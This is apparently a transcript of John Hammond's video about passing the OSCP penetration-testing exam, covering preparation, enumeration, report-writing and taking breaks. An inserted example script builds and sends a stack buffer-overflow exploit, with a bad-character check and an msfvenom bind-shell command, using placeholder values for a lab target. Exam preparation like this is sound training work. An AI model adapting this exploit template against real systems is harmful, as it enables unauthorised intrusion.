Hey, what's going on everybody? My name is John Hammond, and in this video I wanted to talk about my OSCP experience, or the Offensive Security Certified Professional exam. So I know there are already a ton of these videos and blogs and articles out on the internet. It's kind of like an obligatory thing you have to do after you take the OSCP exam. So this is my take. I hope you enjoy.

First I need to give kind of a disclaimer. This video is not intended to come across as, I don't know, I don't want to come across like some pretentious, arrogant jerk guy. I did not expect the exam to go the way that it did.

So I had got 30 days of lab access, which is that preliminary period: okay, you have the time to prep and go through the PWK course before you take the OSCP exam. I got 30 days so I would have time to practice. I was busy during the first month. I got it in August, and my lab access time was going to end on September 10th, and I was at DerbyCon while that was going to happen. So I ended up getting 15 days more so I could keep cramming, because I made it my goal to make sure that I would complete the lab report. You know, that's an optional thing, like you don't have to do it. It will give you 5 extra points, or 5 bonus points if you need them on the exam, but you need to break into at least 10 of the lab machines and complete all of the exercises, and there are so many exercises. It took forever; I spent way too much time on that, but I made sure that I got it, because I wanted to ensure that no matter what happened, if maybe I was just at the brink, at the cusp of passing, and I needed, oh, 5 points, that would have been it, I would have been smooth sailing. I didn't want to be kicking myself later if I wasn't going to pass just by 5 points, so I made sure that I got that done. I wanted to put in as much padding as possible, and my lab report was 240 pages. It was huge. I took a lot of screenshots.
That's something that I swear by: take as many screenshots as you can. I ended up using a kind of markdown-to-PDF converter, which was super nice. So I just didn't have to leave Sublime Text, which is where I was already taking notes, and it was easy and quick: take a screenshot, copy it into my home directory, move it into the directory I need, and then here's a quick link for that screenshot in markdown. It was awesome, and that's what I would recommend to you if you hate dealing with Microsoft Word and OpenOffice and all that crap.

So I ended up extending that lab access for 15 days so I could get the lab report done, and I scheduled to take my exam on September 22nd, which would have been this Sunday. So I got my results back this Wednesday, which was today. I got them in the morning. But, back to the exam: it was a Sunday morning. I spent the weekend knowing that I was going to have to go into work after probably staying up all night, for 24 hours, to take the exam, and I would have to go to work and function like a regular human being. I was just going to be a zombie.

So Saturday I didn't actually spend a whole lot of time prepping or worrying about the exam. I spent some time with my girlfriend. We went to see a comedy show, and it was just: get OSCP out of my mind. I didn't want to be concerned with it at the time. When it came to Sunday, I came to start the exam. It was exam day. My test started at 7 in the morning and I got up at 6. I took a shower. I made some eggs for breakfast so I could, like, hey, clear my mind, get things ready, and my computer was acting up. I turned it on and it was booting with, like, RAID only, and I have a Dell XPS, so like it won't boot Ubuntu, and I was like, what the crap? Oh my gosh. This is the most annoying thing. I cannot have this when my OSCP exam is about to start, and I just needed to go into the BIOS and switch to AHCI. It's stupid and frustrating and it scared me, and I was already nervous and whatever. I needed to clear my mind.
I got ready. 7 a.m., it started, and we were off to the races. So I started with the buffer overflow machine, and I would be running scans for the other machines in the background while I was doing that. It took me about an hour to get the buffer overflow machine done. My tips for you, what I would recommend when you're doing the buffer overflow, is that you're very likely going to be documenting all the stuff that you do. You're setting it up so that Offensive Security will be able to replicate your steps. Like, the whole point of the report is that another penetration tester can follow through with what you did, it all makes sense, and they can replicate it. So what I would recommend is, when you're setting up your callback or whatever you need to do to get shell access on the machine, don't have the machine call back to you, but set up your payload and shellcode so that you can go back to it. That way there's no need for them to regenerate shellcode, and there's no need for them to try and create their RHOST and RPORT, and maybe they'll type that in wrong, or because they regenerated shellcode with whatever encoding, it may include some of the bad characters that you forgot or you missed. So what I would recommend is just make it one way, so that you can call back to it, not it call back to you, and that way you can just say, look, use this script, use this shellcode, and it'll work, and that's what you need to do.

Once I was done with the buffer overflow machine, I already had my scans and some enumeration done for the other machines, and you know they say enumeration is the key: enumeration, enumeration, enumeration.
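The buffer-overflow advice above, in code, as an added example that is not part of John's video or his report: assemble the exploit buffer once, with a bind-shell payload the grader can reach on a fixed port, and refuse to emit it if any byte after the junk (return address included) is a bad character. The offset, return address, bad-character list, service prefix and the stand-in "shellcode" bytes are all constructed for this example; the real values come from your own crash analysis and msfvenom output.

```python
import socket
import struct

# Hypothetical target parameters (constructed for this example; take the real
# ones from your own fuzzing, offset discovery and bad-character analysis).
OFFSET = 2003                    # bytes of junk before EIP is overwritten
RET_ADDR = 0x625011AF            # hypothetical JMP ESP in a non-ASLR module
BAD_CHARS = b"\x00\x0a\x0d"      # bytes the target truncates or mangles on
NOP_SLED = b"\x90" * 16

# Stand-in shellcode: every byte value from 0x01 to 0x3F except the bad ones.
# A real bind-shell payload would come from something like
#   msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f python
# A bind shell means the grader connects *to* the target, so they never need
# to regenerate the payload with their own LHOST/LPORT.
SHELLCODE = bytes(range(0x01, 0x0A)) + bytes(range(0x0B, 0x0D)) + bytes(range(0x0E, 0x40))


def find_bad_chars(blob: bytes, bad_chars: bytes = BAD_CHARS) -> list[tuple[int, int]]:
    """Return (offset, byte) pairs for every bad character present in blob.

    An empty list means the blob is safe to embed. Run it on the packed return
    address too: a JMP ESP address containing 0x00 or 0x0A gets truncated
    exactly like shellcode would.
    """
    return [(i, b) for i, b in enumerate(blob) if b in bad_chars]


def build_payload(shellcode: bytes = SHELLCODE,
                  offset: int = OFFSET,
                  ret_addr: int = RET_ADDR,
                  nop_sled: bytes = NOP_SLED,
                  bad_chars: bytes = BAD_CHARS) -> bytes:
    """Assemble junk + return address + NOP sled + shellcode, refusing to
    emit a buffer that carries a bad character anywhere after the junk."""
    ret = struct.pack("<I", ret_addr)          # little-endian, 32-bit x86
    tail = ret + nop_sled + shellcode
    hits = find_bad_chars(tail, bad_chars)
    if hits:
        where = ", ".join(f"0x{b:02x}@{i}" for i, b in hits)
        raise ValueError(f"payload contains bad characters: {where}")
    return b"A" * offset + tail


def payload_layout(payload: bytes, offset: int = OFFSET,
                   nop_len: int = len(NOP_SLED)) -> dict[str, int]:
    """Where each region of the finished buffer starts, so the report can
    state the layout exactly as the bytes that go over the wire."""
    return {
        "eip": offset,
        "nops": offset + 4,
        "shellcode": offset + 4 + nop_len,
        "total": len(payload),
    }


def send_exploit(host: str, port: int, payload: bytes, prefix: bytes = b"") -> int:
    """Deliver the buffer to the vulnerable service. `prefix` is whatever
    command the target's protocol expects before the overflowing argument
    (hypothetical here); returns the number of bytes sent."""
    with socket.create_connection((host, port), timeout=5) as s:
        return s.send(prefix + payload + b"\r\n")


if __name__ == "__main__":
    buf = build_payload()
    print(payload_layout(buf))
    # send_exploit("10.10.10.5", 9999, buf)   # then: nc 10.10.10.5 4444
```

Checking the tail rather than only the shellcode is the point: a grader who regenerates the payload with a different encoder, or retypes the return address, can reintroduce a byte the target truncates on, and the exploit then fails silently. Shipping one fixed buffer with the check built in removes that step from their side entirely.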
It's like the most... like, I hear people say that's the frustrating thing to hear back as an answer when you're trying to ask for help. Or it's like, oh, try harder, and that annoys people. But I have to agree, you know, enumeration is what's going to give you potentially those avenues, those routes to go down, those roads to look at, where maybe you'll find your initial foothold and compromise.

I took a lot of breaks. Like, I would get up, I'd get off the keyboard, I would just say, hey, I've got to go take a break, and 10 minutes, 15 minutes, I would take a break every hour at least. Maybe if I was in the zone, I was working on something, I took a break after two hours, and then I would get back at it. I'd just kind of clear my head, pace around the house, I literally did that so many times, review what I had, because I was like, okay, I've got low privilege access here, I've got another thing here, and maybe I still need to figure out what I need to do on that machine. I was all over the place. I was taking notes in Sublime Text, I had my enumeration set, but I needed to take breaks, and I want to reiterate that to you: take breaks. Do not just power through 24 hours of an exam when you're hurting, right? It's a stressful thing. So my tweak on the "try harder" answer that people will give to you is: take a break and try again, don't try harder. I know that's the frustrating thing to hear; it's like, you're already trying hard enough, you're already trying, you wouldn't be doing this if you weren't trying. But try your process again. Like, go back, go take a look at those scan results, go poke those ports one more time, even the ones that you didn't think might mean anything, because they're there purposefully, they're there for a reason. Like, I would eventually, and this happened, I looked at a port, a protocol and a port, and I was like, I didn't even know I could enumerate this thing, and then I was like, oh, these are the pieces of the puzzle, this is why this is here, and this makes sense, now I can use this to leverage and stage something, and I would be able to get onto that machine.

I did not use Metasploit. I didn't use Metasploit at all. I used msfvenom, right, to craft our payloads and get our shellcode, but I had no need to use Metasploit, because the process was: look through our scripts, look through, okay, our scan results, look through everything that we enumerated, and then do our research, look if there are any known exploits, and there always are. That's the idea of this: being able to track down the exploit, see the vulnerability, know how to adapt and just tweak that exploit. Another benefit of having that lab report is that a lot of your work is already done, so if there's something like, hey, I know how to do this, I know what I'm up against, I know what syntax I need, I can just Ctrl+F real quickly in my lab report and bang it out, and there it is. Having those as your notes, and some of it already as documentation, is an awesome thing. So again, do the lab report. I really recommend that.

So my exam started at seven in the morning, and by noon I knew, with my lab report, that I had more than 70 points to pass. I was five hours in. I told myself, hey, I'm not going to rely on these five points, that's a risk, that's a gamble, I want to go for more, I want to keep eating stuff up. So I kept working to get more access, enumerating things to try and figure out, hey, what privesc do I need to do, how can I actually get a shell on this one last box, or whatever the case may be, and by three p.m. I had compromised everything. I had full access on all five of the machines and had all the pictures, the screenshots of proof.txt, and I was like, that's it, I'm going to start writing my report now. It's already in markdown, everything that I've already been doing in Sublime Text, so quick and easy. I spent the next six hours of the time that I had on that; I spent eight hours to go through the boxes, to take the exam, then I went to do my report, and I was done by 9 p.m.
I was really ecstatic and pleased and just happy that, hey, I was able to put all these puzzle pieces together, because that was it: I was just tracking things down and looking for things. What I can suggest to you is to practice and play and try, and don't give up. Yeah, the "try harder" manifesto is there, and sometimes it's painful to hear, but it's not strictly try harder, it's keep trying, and take a step back and look through your results from LinEnum, linuxprivchecker, Sherlock and Watson, and all those other things. If you keep mulling through that and drowning in that, you'll find what it is that you're looking for. A lot of times I was in the labs and, it's easy in the lab environment with the machines, to just, okay, drop Metasploit here, get on the machine and run my enumeration scripts, like, oh cool, I can do a little kernel exploit, and it's quick and easy, and it was good in some of those cases, but when it came to the real thing you're not going to have as much luck with some of those kernel techniques. So the bare-bones stuff that you need to do: enumeration, check processes, check services, check ports that are open, check any version numbers of that software, look online if there's stuff for that already, and that's everything that will get you what you need.

So those are my tips, that's my experience. It was a success. I was really, really pleased and happy with it. And honestly, a thing that I kind of want to suggest to you is, if you don't have whatever support... I hate saying, oh yeah, have the support thing, but obviously I live with three guys, other hackers, and I'm engaged in the community, between you guys in the Discord server and those watching my videos and others in the infosec community. It's easy to be with great people, and they say, hey, oh hey dude, you're taking your OSCP, like, you got this man, it's too easy, you're going to crush that thing, and sometimes that's what you need, that encouragement. That goes a long way.

So as much of a great success as this was for me, I am thankful for all of you guys, and for those of you that kind of keep track of, hey, what I'm up to, the things that I like to do. So thank you; you know, I can't say it enough. I realize that this video is not particularly all-encompassing, and I know you guys might have some of your own questions that I'm more than happy to answer. I think what I might like to do is a little stream or ask-me-anything where we just kind of talk about some of the stuff you guys have more specific questions about that I haven't particularly addressed, like, what do you do when you get stuck in a rabbit hole? It's like, go take a step back, and I swear by that, and some of those tricks for your buffer overflow and your enumeration and what you're really staring at: just don't stop, keep going, take a break, clear your mind, and then try it again. Hey, thank you guys for watching. I hope you enjoyed this. I'm really excited about this, I'm really pleased, I hope you are too. You've got to go take your OSCP if you haven't already got it. What's next, right? I want to go churn out OSCE and then OSEE, next steps in professional development. So thank you guys, I hope to see you in the next video, hope to see you on the Discord server, and we'll keep chatting. Love you.